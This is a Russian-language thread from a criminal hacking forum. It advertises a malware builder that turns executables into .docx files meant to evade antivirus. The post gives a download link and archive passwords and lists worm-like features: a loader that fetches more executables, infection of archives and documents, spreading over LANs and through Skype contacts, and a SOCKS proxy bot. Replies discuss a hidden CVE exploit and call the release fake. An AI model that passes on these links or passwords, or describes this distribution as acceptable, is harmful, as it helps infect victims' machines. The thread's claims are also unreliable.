• XSS.stack #1 – первый литературный журнал от юзеров форума

malware Exploit Office Builder - внедряет ваш exe в docx + заражение и лоадер 1.0

ClopSka

CD-диск
Пользователь
Регистрация
30.06.2019
Сообщения
10
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован
Пароль на архив: 666
Скачать: https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk

Софт эксплуатирует ваш exe в формат .docx который легко можно отправить по почте, сам файл дока не палится не одним АВ если ваш exe то же чистый.

Функционал:
  • Лоадер (скачивает и запускает доп exe по прямой ссылки, не используйте https/ssl)
  • Заражает все файлы внутри RAR и ZIP
  • Заражает все .docx (уже обычным макросом, не таскать же нам приватный эксплойт за собой)
  • Копирует себя по дискам и лен сетям
  • Отправляет себя по всем контактам в скайпе
  • Сокс прокси бот с отправкой IP на почту
Все файлы должны быть в одной папке с билдером при создании docx файла

image.png
 
кто проверит на клей чудо это......
У вас должно быть более 500 сообщений для просмотра скрытого контента.
conf.dll - архив, пароль - windowshoststs
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
А чё за шляпа у тебя в архиве темидой накрытая? services.exe - Service for Intel(R) HD Graphics Control Panel
Сам инжект эксплойта, думал спрячу. т.к в паблике нет. Не пали хоть...и юзайте на виртуалке если очкуете
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Так ты код свой защищай хоть немного))
А ты еще на ВТ слил exe где CVE эксплойт вшит... это по сути инжект автоматизированный. Разберут и уже на 5 детектов будет. :confused: Удали пост.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
что за шляпа? выслать ип на почту и сокс бот, как туда конектиться? белых айпи сейчас нема, везде наты хренаты и так далее. кикие там 0дей которые не спалятся, о чем вы?
 
что за шляпа? выслать ип на почту и сокс бот, как туда конектиться? белых айпи сейчас нема, везде наты хренаты и так далее. кикие там 0дей которые не спалятся, о чем вы?
Не говори ))) 0дей там )))
Мне как брокеру смешно такое читать даже.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
[QUOTE = "ClopSka, bài: 170697, thành viên: 184045"]
Mật khẩu để lưu trữ: 666
Tải xuống: https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk

Phần mềm sử dụng exe của bạn ở định dạng .docx, có thể dễ dàng gửi qua thư, bản thân tệp dock không ghi nhiều hơn một AV nếu exe của bạn vẫn sạch.

Chức năng:
  • Trình tải (tải xuống và chạy exe bổ sung qua liên kết trực tiếp, không sử dụng http s / ssl )
  • Lây nhiễm tất cả các tệp trong RAR và ZIP
  • Nó lây nhiễm tất cả .docx (đã có macro thông thường, không nên kéo chúng tôi một khai thác riêng phía sau chúng tôi)
  • Sao chép chính nó vào ổ đĩa và mạng lanh
  • Gửi chính mình đến tất cả các địa chỉ liên lạc trên Skype
  • Sox proxy bot với việc gửi IP đến thư
Tất cả các tệp phải nằm trong cùng thư mục với trình tạo khi tạo tệp docx

image.png
[/ HỎI]
Fake fake fake... Do not sus....lol
 
прикольно, на проге в заголовке Builder 2019 by Vazonez - тс какой нах вазонез в 2019 году? )))
уже только одно это могло сказать что нужно удалить топ, а тут еще куча народу уже факает - лол
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пароль на архив: 666
Скачать: https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk

Софт эксплуатирует ваш exe в формат .docx который легко можно отправить по почте, сам файл дока не палится не одним АВ если ваш exe то же чистый.

Функционал:
  • Лоадер (скачивает и запускает доп exe по прямой ссылки, не используйте https/ssl)
  • Заражает все файлы внутри RAR и ZIP
  • Заражает все .docx (уже обычным макросом, не таскать же нам приватный эксплойт за собой)
  • Копирует себя по дискам и лен сетям
  • Отправляет себя по всем контактам в скайпе
  • Сокс прокси бот с отправкой IP на почту
Все файлы должны быть в одной папке с билдером при создании docx файла

image.png

-----------------------------------------------------------
A toddler hacker, you are very childish.
Untitled.png


ETH, BTC, XMR, LTC ???????????????????
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх